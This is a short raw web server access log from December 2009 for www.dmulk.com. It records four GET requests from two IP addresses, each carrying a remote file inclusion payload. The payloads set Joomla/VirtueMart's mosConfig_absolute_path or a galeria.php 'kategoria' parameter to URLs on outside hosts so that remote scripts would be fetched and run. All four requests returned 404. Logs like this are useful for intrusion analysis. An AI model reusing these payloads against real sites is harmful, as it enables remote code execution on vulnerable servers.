82.195.252.206 - - [13/Dec/2009:13:12:07 -0800] "GET /logs/access_090402.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.195.252.206 - - [13/Dec/2009:13:12:07 -0800] "GET /logs/access_090407.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [13/Dec/2009:13:15:05 -0800] "GET /logs//galeria.php?start=0&kategoria=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [13/Dec/2009:13:15:06 -0800] "GET /logs/access_090623.log//galeria.php?start=0&kategoria=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
